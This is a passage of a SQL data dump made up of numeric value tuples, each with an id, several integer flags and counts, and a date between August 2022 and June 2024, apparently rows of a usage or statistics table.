(1862,0,0,1,1137,21,1,'2022-08-15'),(1864,1,0,0,0,21,22,'2022-08-16'),(1868,0,0,1,1263,21,5,'2022-08-16'),(1869,0,0,1,1141,21,1,'2022-08-16'),(1870,0,0,1,1170,21,3,'2022-08-16'),(1871,0,0,1,1086,21,1,'2022-08-16'),(1872,0,0,1,1088,21,1,'2022-08-16'),(1873,0,0,1,1145,21,1,'2022-08-16'),(1889,9,0,0,128,1,1,'2022-08-16'),(1890,0,0,1,1287,21,5,'2022-08-16'),(1892,9,0,0,129,1,1,'2022-08-16'),(1893,0,0,1,1069,21,1,'2022-08-16'),(1894,9,0,0,85,1,1,'2022-08-16'),(1895,0,0,1,1125,21,1,'2022-08-16'),(1896,0,0,1,1126,21,1,'2022-08-16'),(1897,9,0,0,35,1,3,'2022-08-16'),(1898,9,0,0,36,1,1,'2022-08-16'),(1899,0,0,1,1264,21,3,'2022-08-16'),(1900,0,0,1,1122,21,1,'2022-08-16'),(1901,0,0,1,1123,21,1,'2022-08-16'),(1902,0,0,1,1137,21,1,'2022-08-16'),(1903,0,0,1,1138,21,1,'2022-08-16'),(1904,0,0,1,1093,21,1,'2022-08-16'),(1905,0,0,1,1131,21,1,'2022-08-16'),(1908,0,0,1,1132,21,1,'2022-08-16'),(1909,0,0,1,1128,21,1,'2022-08-16'),(1910,0,0,1,1129,21,1,'2022-08-16'),(1911,0,0,1,1119,21,2,'2022-08-16'),(1912,0,0,1,1134,21,1,'2022-08-16'),(1913,0,0,1,1135,21,1,'2022-08-16'),(1914,0,0,1,1120,21,1,'2022-08-16'),(1915,9,0,0,77,1,1,'2022-08-16'),(1916,0,0,1,1114,21,3,'2022-08-16'),(1917,0,0,1,1116,21,2,'2022-08-16'),(1918,9,0,0,37,1,1,'2022-08-16'),(1919,9,0,0,130,1,1,'2022-08-16'),(1920,9,0,0,38,1,1,'2022-08-16'),(1921,0,0,1,1288,21,3,'2022-08-16'),(1922,0,0,1,1289,21,3,'2022-08-16'),(1923,0,0,1,1163,21,3,'2022-08-16'),(1927,0,0,1,1091,21,1,'2022-08-16'),(1928,0,0,1,1159,21,3,'2022-08-16'),(1929,0,0,1,1102,21,1,'2022-08-16'),(1930,0,0,1,1117,21,3,'2022-08-16'),(1931,9,0,0,127,1,1,'2022-08-16'),(1932,0,0,1,1097,21,1,'2022-08-16'),(1935,0,0,1,1161,21,2,'2022-08-16'),(1939,0,0,1,1167,21,2,'2022-08-16'),(1941,0,0,1,1169,21,2,'2022-08-16'),(1943,0,0,1,1109,21,2,'2022-08-16'),(1944,0,0,1,1111,21,2,'2022-08-16'),(1968,0,0,1,1263,21,1,'2022-08-18'),(1969,9,0,0,85,1,1,'2022-08-18'),(1970,0,0,1,1125,21,1,'2022-08-18'),(1971,0,0,1,1125,21,1,'2022-08-19'),(1972,0,0,1,1137,21,1,'2022-08-20'),(1973,0,0,1,1135,21,1,'2022-08-20'),(1974,0,0,1,1131,21,1,'2022-08-20'),(1975,0,0,1,1170,21,1,'2022-08-20'),(1976,9,0,0,36,1,1,'2022-08-21'),(1977,1,0,0,0,21,1,'2022-08-21'),(1978,9,0,0,37,1,1,'2022-08-21'),(1979,0,0,1,1287,21,1,'2022-08-21'),(1980,0,0,1,1264,21,1,'2022-08-21'),(1981,0,0,1,1263,21,1,'2022-08-21'),(1982,9,0,0,77,1,1,'2022-08-24'),(1983,9,0,0,38,1,1,'2022-08-24'),(1984,9,0,0,130,1,1,'2022-08-24'),(1985,0,0,1,1091,21,1,'2022-08-24'),(1986,0,0,1,1097,21,1,'2022-08-24'),(1987,9,0,0,35,1,1,'2022-08-24'),(1988,0,0,1,1138,21,1,'2022-08-24'),(1989,0,0,1,1122,21,1,'2022-08-24'),(1990,9,0,0,37,1,1,'2022-08-24'),(1991,0,0,1,1132,21,1,'2022-08-24'),(1992,0,0,1,1167,21,1,'2022-08-24'),(1993,1,0,0,0,21,1,'2022-08-24'),(1994,0,0,1,1129,21,1,'2022-08-24'),(1995,9,0,0,36,1,1,'2022-08-24'),(1996,0,0,1,1114,21,1,'2022-08-24'),(1997,0,0,1,1137,21,1,'2022-08-24'),(1998,0,0,1,1120,21,1,'2022-08-25'),(1999,1,0,0,0,21,1,'2022-08-26'),(2000,0,0,1,1135,21,2,'2022-08-26'),(2002,0,0,1,1264,21,1,'2022-08-27'),(2003,0,0,1,1082,21,1,'2022-08-27'),(2004,0,0,1,1143,21,1,'2022-08-27'),(2005,0,0,1,1140,21,1,'2022-08-27'),(2006,0,0,1,1145,21,1,'2022-08-27'),(2007,1,0,0,0,21,1,'2022-08-27'),(2008,0,0,1,1116,21,1,'2022-08-28'),(2009,0,0,1,1085,21,1,'2022-08-28'),(2010,0,0,1,1144,21,1,'2022-08-28'),(2011,0,0,1,1087,21,1,'2022-08-28'),(2012,0,0,1,1095,21,1,'2022-08-28'),(2013,0,0,1,1089,21,1,'2022-08-28'),(2014,0,0,1,1092,21,1,'2022-08-28'),(2015,0,0,1,1083,21,1,'2022-08-28'),(2016,0,0,1,1134,21,1,'2022-08-28'),(2017,0,0,1,1161,21,1,'2022-08-28'),(2018,1,0,0,0,21,1,'2022-08-28'),(2019,0,0,1,1084,21,1,'2022-08-28'),(2020,0,0,1,1131,21,1,'2022-08-28'),(2021,0,0,1,1263,21,1,'2022-08-28'),(2022,9,0,0,127,1,1,'2022-08-28'),(2023,0,0,1,1135,21,1,'2022-08-28'),(2024,9,0,0,85,1,1,'2022-08-28'),(2025,0,0,1,1109,21,1,'2022-08-28'),(2026,0,0,1,1125,21,1,'2022-08-28'),(2027,0,0,1,1107,21,1,'2022-08-29'),(2028,0,0,1,1109,21,1,'2022-08-29'),(2029,0,0,1,1082,21,1,'2022-08-29'),(2030,0,0,1,1085,21,1,'2022-08-30'),(2031,0,0,1,1119,21,1,'2022-08-30'),(2032,0,0,1,1084,21,1,'2022-08-30'),(2033,0,0,1,1287,21,1,'2022-08-30'),(2034,0,0,1,1289,21,1,'2022-08-30'),(2035,9,0,0,130,1,1,'2022-08-30'),(2036,0,0,1,1263,21,1,'2022-08-31'),(2037,0,0,1,1123,21,1,'2022-09-01'),(2038,0,0,1,1135,21,1,'2022-09-01'),(2039,0,0,1,1264,21,1,'2022-09-01'),(2040,0,0,1,1287,21,4,'2022-09-02'),(2041,0,0,1,1135,21,1,'2022-09-02'),(2042,0,0,1,1145,21,1,'2022-09-02'),(2043,0,0,1,1097,21,2,'2022-09-02'),(2044,0,0,1,1263,21,3,'2022-09-02'),(2045,0,0,1,1159,21,3,'2022-09-02'),(2046,0,0,1,1161,21,3,'2022-09-02'),(2048,0,0,1,1163,21,3,'2022-09-02'),(2049,0,0,1,1288,21,3,'2022-09-02'),(2050,0,0,1,1165,21,3,'2022-09-02'),(2051,0,0,1,1289,21,3,'2022-09-02'),(2052,0,0,1,1167,21,3,'2022-09-02'),(2053,0,0,1,1169,21,3,'2022-09-02'),(2054,0,0,1,1170,21,3,'2022-09-02'),(2055,0,0,1,1111,21,3,'2022-09-02'),(2068,0,0,1,1117,21,2,'2022-09-02'),(2069,1,0,0,0,21,1,'2022-09-02'),(2070,9,0,0,130,1,1,'2022-09-02'),(2071,9,0,0,127,1,1,'2022-09-02'),(2072,9,0,0,128,1,1,'2022-09-02'),(2073,9,0,0,129,1,1,'2022-09-02'),(2074,0,0,1,1116,21,1,'2022-09-02'),(2078,0,0,1,1120,21,1,'2022-09-02'),(2079,9,0,0,35,1,1,'2022-09-02'),(2081,0,0,1,1114,21,1,'2022-09-02'),(2088,0,0,1,1109,21,1,'2022-09-02'),(2089,9,0,0,38,1,1,'2022-09-02'),(2091,0,0,1,1119,21,1,'2022-09-02'),(2093,9,0,0,37,1,1,'2022-09-02'),(2096,0,0,1,1122,21,1,'2022-09-02'),(2097,9,0,0,77,1,1,'2022-09-02'),(2098,1,0,0,0,21,1,'2022-09-19'),(2099,1,0,0,0,21,1,'2022-09-20'),(2100,1,0,0,0,21,6,'2022-09-21'),(2106,1,0,0,0,21,2,'2022-09-30'),(2108,1,0,0,0,21,1,'2022-10-03'),(2109,1,0,0,0,21,3,'2022-10-10'),(2112,1,0,0,0,21,1,'2022-10-11'),(2113,9,0,0,136,1,3,'2022-10-14'),(2114,1,0,0,0,1,5,'2022-10-14'),(2115,0,0,1,1755,1,4,'2022-10-14'),(2121,0,0,1,1775,1,2,'2022-10-14'),(2125,0,0,1,1786,1,1,'2022-10-14'),(2126,9,0,0,135,1,1,'2022-10-14'),(2129,1,0,0,0,1,1,'2022-10-15'),(2130,1,0,0,0,1,1,'2022-10-16'),(2131,1,0,0,0,1,2,'2022-10-17'),(2133,0,0,1,1755,1,1,'2022-10-19'),(2134,1,0,0,0,1,4,'2022-10-19'),(2138,1,0,0,0,1,4,'2022-10-20'),(2142,1,0,0,0,1,1,'2022-10-25'),(2143,1,0,0,0,1,4,'2022-10-27'),(2144,9,0,0,136,1,1,'2022-10-27'),(2148,1,0,0,0,1,3,'2022-10-28'),(2151,1,0,0,0,1,1,'2022-11-02'),(2152,1,0,0,0,1,1,'2022-11-07'),(2153,1,0,0,0,1,1,'2022-11-12'),(2154,1,0,0,0,1,1,'2022-11-16'),(2155,1,0,0,0,1,1,'2022-11-17'),(2156,1,0,0,0,1,1,'2022-11-22'),(2157,9,0,0,136,1,1,'2022-11-22'),(2158,1,0,0,0,1,1,'2022-11-25'),(2159,1,0,0,0,1,1,'2022-12-30'),(2160,1,0,0,0,1,1,'2023-01-01'),(2161,1,0,0,0,1,1,'2023-01-02'),(2162,1,0,0,0,1,1,'2023-01-11'),(2163,1,0,0,0,1,1,'2023-01-20'),(2164,1,0,0,0,1,1,'2023-01-23'),(2165,1,0,0,0,1,1,'2023-01-24'),(2166,1,0,0,0,1,1,'2023-02-06'),(2167,1,0,0,0,1,1,'2023-02-12'),(2168,1,0,0,0,1,1,'2023-02-23'),(2169,1,0,0,0,1,1,'2023-03-05'),(2170,1,0,0,0,1,1,'2023-03-10'),(2171,1,0,0,0,1,1,'2023-03-12'),(2172,1,0,0,0,1,1,'2023-03-13'),(2173,1,0,0,0,1,1,'2023-03-15'),(2174,1,0,0,0,1,2,'2023-03-16'),(2175,0,0,1,1755,1,1,'2023-03-16'),(2177,9,0,0,136,1,3,'2023-03-17'),(2178,9,0,0,135,1,2,'2023-03-17'),(2179,9,0,0,85,1,1,'2023-03-17'),(2180,0,0,1,1775,1,2,'2023-03-17'),(2181,0,0,1,1786,1,1,'2023-03-17'),(2182,0,0,1,1755,1,2,'2023-03-17'),(2183,1,0,0,0,1,3,'2023-03-17'),(2191,9,0,0,135,1,1,'2023-03-19'),(2192,1,0,0,0,1,1,'2023-03-22'),(2193,9,0,0,135,1,2,'2023-03-27'),(2195,1,0,0,0,1,1,'2023-04-01'),(2196,1,0,0,0,1,1,'2023-04-14'),(2197,1,0,0,0,1,1,'2023-04-15'),(2198,1,0,0,0,1,3,'2023-04-17'),(2201,1,0,0,0,1,1,'2023-04-23'),(2202,0,0,1,1786,1,1,'2023-04-24'),(2203,0,0,1,1755,1,1,'2023-04-24'),(2204,0,0,1,1775,1,1,'2023-04-24'),(2205,9,0,0,135,1,1,'2023-04-24'),(2206,9,0,0,136,1,1,'2023-04-24'),(2207,9,0,0,85,1,1,'2023-04-24'),(2208,1,0,0,0,1,1,'2023-04-26'),(2209,0,0,1,1786,1,1,'2023-04-29'),(2210,1,0,0,0,1,4,'2023-05-06'),(2214,1,0,0,0,1,2,'2023-05-10'),(2216,0,0,1,1775,1,1,'2023-05-11'),(2217,1,0,0,0,1,1,'2023-05-15'),(2218,1,0,0,0,1,1,'2023-05-21'),(2219,1,0,0,0,1,2,'2023-05-22'),(2221,9,0,0,135,1,1,'2023-05-22'),(2222,9,0,0,85,1,1,'2023-05-22'),(2223,9,0,0,136,1,1,'2023-05-22'),(2224,0,0,1,1755,1,2,'2023-05-22'),(2225,0,0,1,1775,1,2,'2023-05-22'),(2226,0,0,1,1786,1,2,'2023-05-22'),(2230,9,0,0,136,1,1,'2023-05-27'),(2231,1,0,0,0,1,1,'2023-05-27'),(2232,0,0,1,1755,1,1,'2023-06-03'),(2233,0,0,1,1775,1,1,'2023-06-03'),(2234,0,0,1,1786,1,1,'2023-06-03'),(2235,1,0,0,0,1,1,'2023-06-07'),(2236,1,0,0,0,1,1,'2023-06-10'),(2237,1,0,0,0,1,1,'2023-06-15'),(2238,1,0,0,0,1,1,'2023-06-16'),(2239,1,0,0,0,1,1,'2023-06-18'),(2240,1,0,0,0,1,1,'2023-06-19'),(2241,1,0,0,0,1,1,'2023-06-23'),(2242,1,0,0,0,1,1,'2023-06-25'),(2243,1,0,0,0,1,1,'2023-06-27'),(2244,1,0,0,0,1,4,'2023-07-01'),(2248,9,0,0,136,1,1,'2023-07-03'),(2249,1,0,0,0,1,1,'2023-07-09'),(2250,1,0,0,0,1,1,'2023-07-13'),(2251,1,0,0,0,1,1,'2023-07-16'),(2252,1,0,0,0,1,1,'2023-07-18'),(2253,1,0,0,0,1,1,'2023-07-31'),(2254,1,0,0,0,1,1,'2023-08-01'),(2255,1,0,0,0,1,1,'2023-08-02'),(2256,9,0,0,136,1,1,'2023-08-02'),(2257,9,0,0,135,1,1,'2023-08-02'),(2258,9,0,0,85,1,1,'2023-08-02'),(2259,0,1,0,0,21,1,'2023-08-09'),(2260,1,0,0,0,1,3,'2023-08-09'),(2263,1,0,0,0,1,1,'2023-08-11'),(2264,9,0,0,136,1,2,'2023-08-14'),(2266,1,0,0,0,1,1,'2023-08-14'),(2267,1,0,0,0,1,1,'2023-08-15'),(2268,1,0,0,0,1,3,'2023-08-17'),(2271,1,0,0,0,1,1,'2023-08-19'),(2272,1,0,0,0,1,1,'2023-08-24'),(2273,0,0,1,1775,1,1,'2023-08-24'),(2274,1,0,0,0,1,1,'2023-08-25'),(2275,0,0,1,1786,1,1,'2023-08-26'),(2276,1,0,0,0,1,2,'2023-08-26'),(2277,9,0,0,135,1,1,'2023-08-26'),(2279,1,0,0,0,1,1,'2023-08-27'),(2280,1,0,0,0,1,2,'2023-08-28'),(2282,1,0,0,0,1,1,'2023-08-29'),(2283,1,0,0,0,1,1,'2023-08-30'),(2284,1,0,0,0,1,1,'2023-09-01'),(2285,9,0,0,85,1,1,'2023-09-04'),(2286,1,0,0,0,1,1,'2023-09-04'),(2287,1,0,0,0,1,1,'2023-09-05'),(2288,0,0,1,1755,1,1,'2023-09-05'),(2289,1,0,0,0,1,1,'2023-09-06'),(2290,1,0,0,0,1,3,'2023-09-07'),(2293,1,0,0,0,1,1,'2023-09-08'),(2294,1,0,0,0,1,1,'2023-09-12'),(2295,1,0,0,0,1,1,'2023-09-13'),(2296,1,0,0,0,1,1,'2023-09-14'),(2297,1,0,0,0,1,3,'2023-09-15'),(2300,1,0,0,0,1,3,'2023-09-16'),(2303,1,0,0,0,1,1,'2023-09-18'),(2304,1,0,0,0,1,1,'2023-09-19'),(2305,0,1,0,0,21,1,'2023-09-19'),(2306,1,0,0,0,1,1,'2023-09-21'),(2307,1,0,0,0,1,1,'2023-09-24'),(2308,1,0,0,0,1,1,'2023-09-25'),(2309,1,0,0,0,1,1,'2023-09-27'),(2310,9,0,0,85,1,1,'2023-10-02'),(2311,1,0,0,0,1,5,'2023-10-02'),(2316,1,0,0,0,1,3,'2023-10-03'),(2319,1,0,0,0,1,1,'2023-10-04'),(2320,1,0,0,0,1,1,'2023-10-05'),(2321,9,0,0,136,1,1,'2023-10-06'),(2322,1,0,0,0,1,2,'2023-10-08'),(2324,1,0,0,0,1,1,'2023-10-10'),(2325,1,0,0,0,1,2,'2023-10-13'),(2327,1,0,0,0,1,2,'2023-10-14'),(2329,1,0,0,0,1,1,'2023-10-15'),(2330,1,0,0,0,1,1,'2023-10-16'),(2331,1,0,0,0,1,1,'2023-10-17'),(2332,1,0,0,0,1,1,'2023-10-18'),(2333,1,0,0,0,1,1,'2023-10-19'),(2334,1,0,0,0,1,1,'2023-10-20'),(2335,1,0,0,0,1,1,'2023-10-21'),(2336,9,0,0,136,1,1,'2023-10-22'),(2337,1,0,0,0,1,1,'2023-10-23'),(2338,1,0,0,0,1,3,'2023-10-25'),(2341,1,0,0,0,1,2,'2023-10-27'),(2343,1,0,0,0,1,1,'2023-10-29'),(2344,9,0,0,85,1,1,'2023-10-30'),(2345,1,0,0,0,1,1,'2023-10-31'),(2346,1,0,0,0,1,2,'2023-11-01'),(2348,1,0,0,0,1,1,'2023-11-02'),(2349,1,0,0,0,1,1,'2023-11-07'),(2350,1,0,0,0,1,1,'2023-11-12'),(2351,1,0,0,0,1,1,'2023-11-16'),(2352,1,0,0,0,1,1,'2023-11-22'),(2353,1,0,0,0,1,1,'2023-11-26'),(2354,1,0,0,0,1,1,'2023-11-30'),(2355,9,0,0,136,1,1,'2023-12-07'),(2356,1,0,0,0,1,1,'2023-12-12'),(2357,1,0,0,0,1,1,'2023-12-15'),(2358,1,0,0,0,1,2,'2023-12-16'),(2360,1,0,0,0,1,5,'2023-12-17'),(2365,1,0,0,0,1,3,'2023-12-18'),(2368,1,0,0,0,1,1,'2023-12-22'),(2369,1,0,0,0,1,1,'2023-12-28'),(2370,1,0,0,0,1,3,'2023-12-30'),(2371,0,0,1,1786,1,1,'2023-12-30'),(2373,9,0,0,135,1,2,'2023-12-30'),(2375,0,0,1,1775,1,1,'2023-12-30'),(2377,9,0,0,85,1,1,'2023-12-30'),(2378,9,0,0,136,1,3,'2023-12-30'),(2381,0,0,1,1755,1,2,'2023-12-30'),(2383,1,0,0,0,1,3,'2024-01-02'),(2384,9,0,0,85,1,1,'2024-01-02'),(2385,0,0,1,1786,1,1,'2024-01-02'),(2386,9,0,0,135,1,2,'2024-01-02'),(2389,0,0,1,1775,1,1,'2024-01-02'),(2391,9,0,0,136,1,3,'2024-01-02'),(2394,0,0,1,1755,1,2,'2024-01-02'),(2396,1,0,0,0,1,1,'2024-01-06'),(2397,1,0,0,0,1,2,'2024-01-08'),(2399,0,0,1,1775,1,1,'2024-01-08'),(2400,0,0,1,1755,1,1,'2024-01-08'),(2401,0,0,1,1786,1,1,'2024-01-08'),(2402,9,0,0,85,1,1,'2024-01-08'),(2403,9,0,0,136,1,1,'2024-01-08'),(2404,9,0,0,135,1,1,'2024-01-08'),(2405,1,0,0,0,1,1,'2024-01-09'),(2406,1,0,0,0,1,1,'2024-01-10'),(2407,1,0,0,0,1,1,'2024-01-11'),(2408,1,0,0,0,1,2,'2024-01-13'),(2410,1,0,0,0,1,3,'2024-01-14'),(2413,1,0,0,0,1,5,'2024-01-15'),(2418,1,0,0,0,1,2,'2024-01-16'),(2420,1,0,0,0,1,1,'2024-01-17'),(2421,1,0,0,0,1,1,'2024-01-18'),(2422,1,0,0,0,1,1,'2024-01-28'),(2423,9,0,0,135,1,1,'2024-01-28'),(2424,0,0,1,1755,1,1,'2024-01-28'),(2425,9,0,0,85,1,1,'2024-01-29'),(2426,0,0,1,1786,1,1,'2024-01-29'),(2427,1,0,0,0,1,1,'2024-01-29'),(2428,9,0,0,136,1,1,'2024-01-29'),(2429,9,0,0,135,1,1,'2024-01-29'),(2430,0,0,1,1775,1,1,'2024-01-29'),(2431,0,0,1,1755,1,1,'2024-01-30'),(2432,1,0,0,0,1,3,'2024-01-30'),(2435,0,0,1,1775,1,1,'2024-01-31'),(2436,1,0,0,0,1,1,'2024-01-31'),(2437,9,0,0,136,1,1,'2024-02-01'),(2438,9,0,0,135,1,1,'2024-02-02'),(2439,1,0,0,0,1,1,'2024-02-03'),(2440,9,0,0,136,1,1,'2024-02-04'),(2441,1,0,0,0,1,1,'2024-02-05'),(2442,1,0,0,0,1,1,'2024-02-06'),(2443,1,0,0,0,1,1,'2024-02-07'),(2444,0,0,1,1786,1,1,'2024-02-14'),(2445,1,0,0,0,1,1,'2024-02-14'),(2446,1,0,0,0,1,1,'2024-02-15'),(2447,1,0,0,0,1,1,'2024-02-22'),(2448,1,0,0,0,1,1,'2024-02-24'),(2449,1,0,0,0,1,1,'2024-02-26'),(2450,1,0,0,0,1,1,'2024-03-02'),(2451,1,0,0,0,1,1,'2024-03-05'),(2452,1,0,0,0,1,1,'2024-03-13'),(2453,9,0,0,136,1,1,'2024-03-13'),(2454,1,0,0,0,1,1,'2024-03-14'),(2455,1,0,0,0,1,1,'2024-03-15'),(2456,1,0,0,0,1,3,'2024-03-18'),(2457,9,0,0,85,1,1,'2024-03-18'),(2458,0,0,1,1786,1,1,'2024-03-18'),(2460,9,0,0,135,1,2,'2024-03-18'),(2462,0,0,1,1775,1,1,'2024-03-18'),(2464,9,0,0,136,1,3,'2024-03-18'),(2467,0,0,1,1755,1,2,'2024-03-18'),(2469,1,0,0,0,1,1,'2024-03-22'),(2470,9,0,0,135,1,1,'2024-03-23'),(2471,1,0,0,0,1,1,'2024-03-23'),(2472,1,0,0,0,1,2,'2024-03-24'),(2474,9,0,0,136,1,1,'2024-03-24'),(2475,9,0,0,135,1,1,'2024-03-24'),(2476,9,0,0,85,1,1,'2024-03-24'),(2477,0,0,1,1775,1,1,'2024-03-24'),(2478,0,0,1,1786,1,1,'2024-03-24'),(2479,0,0,1,1755,1,1,'2024-03-24'),(2480,0,0,1,1755,1,1,'2024-03-25'),(2481,9,0,0,136,1,1,'2024-03-25'),(2482,9,0,0,85,1,1,'2024-03-25'),(2483,1,0,0,0,1,1,'2024-03-25'),(2484,0,0,1,1755,1,1,'2024-03-26'),(2485,0,0,1,1755,1,1,'2024-03-28'),(2486,1,0,0,0,1,1,'2024-03-29'),(2487,0,0,1,1775,1,1,'2024-03-31'),(2488,1,0,0,0,1,1,'2024-04-01'),(2489,0,0,1,1755,1,1,'2024-04-01'),(2490,0,0,1,1775,1,2,'2024-04-02'),(2492,1,0,0,0,1,1,'2024-04-05'),(2493,0,0,1,1775,1,2,'2024-04-06'),(2494,9,0,0,136,1,1,'2024-04-06'),(2495,9,0,0,135,1,1,'2024-04-06'),(2496,9,0,0,85,1,1,'2024-04-06'),(2498,0,0,1,1786,1,1,'2024-04-06'),(2499,0,0,1,1755,1,1,'2024-04-06'),(2500,1,0,0,0,1,1,'2024-04-06'),(2501,0,0,1,1775,1,1,'2024-04-07'),(2502,9,0,0,136,1,1,'2024-04-07'),(2503,0,0,1,1755,1,1,'2024-04-08'),(2504,0,0,1,1755,1,1,'2024-04-09'),(2505,9,0,0,136,1,1,'2024-04-10'),(2506,9,0,0,135,1,1,'2024-04-10'),(2507,9,0,0,85,1,1,'2024-04-10'),(2508,0,0,1,1775,1,1,'2024-04-10'),(2509,0,0,1,1786,1,1,'2024-04-10'),(2510,0,0,1,1755,1,1,'2024-04-10'),(2511,1,0,0,0,1,1,'2024-04-10'),(2512,0,0,1,1775,1,1,'2024-04-12'),(2513,0,0,1,1755,1,1,'2024-04-13'),(2514,0,0,1,1775,1,1,'2024-04-14'),(2515,0,0,1,1775,1,1,'2024-04-16'),(2516,1,0,0,0,1,1,'2024-04-16'),(2517,1,0,0,0,1,3,'2024-04-18'),(2520,9,0,0,136,1,2,'2024-04-19'),(2522,1,0,0,0,1,1,'2024-04-19'),(2523,0,0,1,1755,1,1,'2024-04-20'),(2524,9,0,0,136,1,1,'2024-04-20'),(2525,9,0,0,136,1,1,'2024-04-21'),(2526,0,0,1,1775,1,1,'2024-04-21'),(2527,1,0,0,0,1,1,'2024-04-21'),(2528,0,0,1,1755,1,1,'2024-04-22'),(2529,9,0,0,136,1,1,'2024-04-22'),(2530,0,0,1,1755,1,1,'2024-04-23'),(2531,1,0,0,0,1,3,'2024-04-24'),(2534,1,0,0,0,1,2,'2024-04-25'),(2535,9,0,0,136,1,1,'2024-04-25'),(2537,0,0,1,1755,1,1,'2024-04-26'),(2538,1,0,0,0,1,1,'2024-04-26'),(2539,9,0,0,136,1,1,'2024-04-26'),(2540,0,0,1,1775,1,1,'2024-04-26'),(2541,0,0,1,1775,1,1,'2024-04-28'),(2542,9,0,0,136,1,1,'2024-04-29'),(2543,1,0,0,0,1,1,'2024-04-30'),(2544,0,0,1,1775,1,1,'2024-04-30'),(2545,9,0,0,136,1,1,'2024-05-01'),(2546,0,0,1,1755,1,1,'2024-05-01'),(2547,0,0,1,1775,1,1,'2024-05-02'),(2548,1,0,0,0,1,1,'2024-05-02'),(2549,0,0,1,1755,1,1,'2024-05-03'),(2550,0,0,1,1775,1,1,'2024-05-03'),(2551,1,0,0,0,1,1,'2024-05-03'),(2552,1,0,0,0,1,2,'2024-05-04'),(2554,0,0,1,1775,1,1,'2024-05-04'),(2555,0,0,1,1755,1,1,'2024-05-05'),(2556,0,0,1,1775,1,1,'2024-05-05'),(2557,1,0,0,0,1,1,'2024-05-06'),(2558,0,0,1,1755,1,1,'2024-05-06'),(2559,1,0,0,0,1,1,'2024-05-07'),(2560,0,0,1,1755,1,1,'2024-05-08'),(2561,1,0,0,0,1,1,'2024-05-08'),(2562,0,0,1,1775,1,1,'2024-05-08'),(2563,0,0,1,1775,1,1,'2024-05-10'),(2564,9,0,0,136,1,1,'2024-05-10'),(2565,1,0,0,0,1,2,'2024-05-10'),(2567,1,0,0,0,1,3,'2024-05-11'),(2570,0,0,1,1775,1,2,'2024-05-11'),(2572,0,0,1,1775,1,1,'2024-05-12'),(2573,1,0,0,0,1,4,'2024-05-12'),(2577,0,0,1,1755,1,1,'2024-05-12'),(2578,1,0,0,0,1,1,'2024-05-13'),(2579,9,0,0,136,1,1,'2024-05-13'),(2580,0,0,1,1775,1,1,'2024-05-14'),(2581,0,0,1,1755,1,1,'2024-05-14'),(2582,0,0,1,1755,1,2,'2024-05-15'),(2583,1,0,0,0,1,1,'2024-05-15'),(2585,0,0,1,1775,1,1,'2024-05-15'),(2586,1,0,0,0,1,1,'2024-05-16'),(2587,9,0,0,135,1,1,'2024-05-17'),(2588,1,0,0,0,1,1,'2024-05-17'),(2589,0,0,1,1775,1,1,'2024-05-18'),(2590,0,0,1,1775,1,1,'2024-05-19'),(2591,0,0,1,1775,1,1,'2024-05-21'),(2592,0,0,1,1755,1,1,'2024-05-21'),(2593,0,0,1,1755,1,1,'2024-05-22'),(2594,1,0,0,0,1,1,'2024-05-22'),(2595,0,0,1,1775,1,1,'2024-05-22'),(2596,1,0,0,0,1,1,'2024-05-23'),(2597,1,0,0,0,1,2,'2024-05-24'),(2599,1,0,0,0,1,2,'2024-05-25'),(2601,1,0,0,0,1,1,'2024-05-26'),(2602,9,0,0,136,1,1,'2024-05-26'),(2603,0,0,1,1775,1,1,'2024-05-26'),(2604,0,0,1,1775,1,1,'2024-05-27'),(2605,1,0,0,0,1,2,'2024-05-27'),(2607,0,0,1,1775,1,1,'2024-05-28'),(2608,0,0,1,1775,1,1,'2024-05-29'),(2609,1,0,0,0,1,4,'2024-05-29'),(2612,9,0,0,136,1,1,'2024-05-29'),(2614,9,0,0,136,1,1,'2024-05-30'),(2615,1,0,0,0,1,1,'2024-05-30'),(2616,1,0,0,0,1,1,'2024-05-31'),(2617,0,0,1,1755,1,1,'2024-05-31'),(2618,9,0,0,136,1,1,'2024-06-01'),(2619,1,0,0,0,1,1,'2024-06-01'),(2620,9,0,0,136,1,1,'2024-06-02'),(2621,9,0,0,135,1,1,'2024-06-02'),(2622,9,0,0,135,1,1,'2024-06-03'),(2623,0,0,1,1755,1,1,'2024-06-03'),(2624,1,0,0,0,1,2,'2024-06-03'),(2626,1,0,0,0,1,1,'2024-06-04'),(2627,9,0,0,136,1,1,'2024-06-04'),(2628,1,0,0,0,1,1,'2024-06-05'),(2629,9,0,0,136,1,1,'2024-06-06'),(2630,1,0,0,0,1,2,'2024-06-07'),(2632,9,0,0,136,1,1,'2024-06-07'),(2633,1,0,0,0,1,4,'2024-06-08'),(2637,9,0,0,136,1,1,'2024-06-09'),(2638,1,0,0,0,1,1,'2024-06-09'),(2639,9,0,0,85,1,1,'2024-06-10'),(2640,9,0,0,136,1,2,'2024-06-11'),(2642,0,0,1,1775,1,1,'2024-06-12'),(2643,0,0,1,1755,1,1,'2024-06-12'),(2644,9,0,0,135,1,1,'2024-06-12'),(2645,0,0,1,1786,1,1,'2024-06-12'),(2646,9,0,0,136,1,1,'2024-06-12'),(2647,0,0,1,1775,1,1,'2024-06-13'),(2648,9,0,0,136,1,1,'2024-06-14'),(2649,0,0,1,1775,1,1,'2024-06-14'),(2650,1,0,0,0,1,1,'2024-06-14'),(2651,0,0,1,1775,1,1,'2024-06-15'),(2652,0,0,1,1755,1,1,'2024-06-15'),(2653,1,0,0,0,1,1,'2024-06-15'),(2654,1,0,0,0,1,3,'2024-06-16'),(2657,0,0,1,1755,1,1,'2024-06-16'),(2658,1,0,0,0,1,2,'2024-06-18'),(2660,1,0,0,0,1,2,'2024-06-19'),(2662,0,0,1,1755,1,1,'2024-06-19'),(2663,9,0,0,135,1,1,'2024-06-19'),(2664,1,0,0,0,1,2,'2024-06-21'),(2665,0,0,1,1775,1,1,'2024-06-21'),(2666,0,0,1,1755,1,1,'2024-06-21'),(2668,0,0,1,1786,1,1,'2024-06-21'),(2669,1,0,0,0,1,1,'2024-06-23'),(2670,9,0,0,135,1,1,'2024-06-24'),(2671,1,0,0,0,1,1,'2024-06-25'),(2672,9,0,0,136,1,1,'2024-06-25'),(2673,0,0,1,1775,1,2,'2024-06-27'),(2675,9,0,0,85,1,1,'2024-06-28'),(2676,0,0,1,1786,1,1,'2024-06-28'),(2677,9,0,0,136,1,3,'2024-06-28'),(2679,1,0,0,0,1,3,'2024-06-28'),(2680,9,0,0,135,1,2,'2024-06-28'),(2683,0,0,1,1775,1,1,'2024-06-28'),(2686,0,0,1,1755,1,1,'2024-06-28'),(2687,0,0,1,1755,1,1,'2024-06-29'),(2688,1,0,0,0,1,3,'2024-06-29'),(2691,1,0,0,0,1,2,'2024-06-30'),(2693,9,0,0,136,1,1,'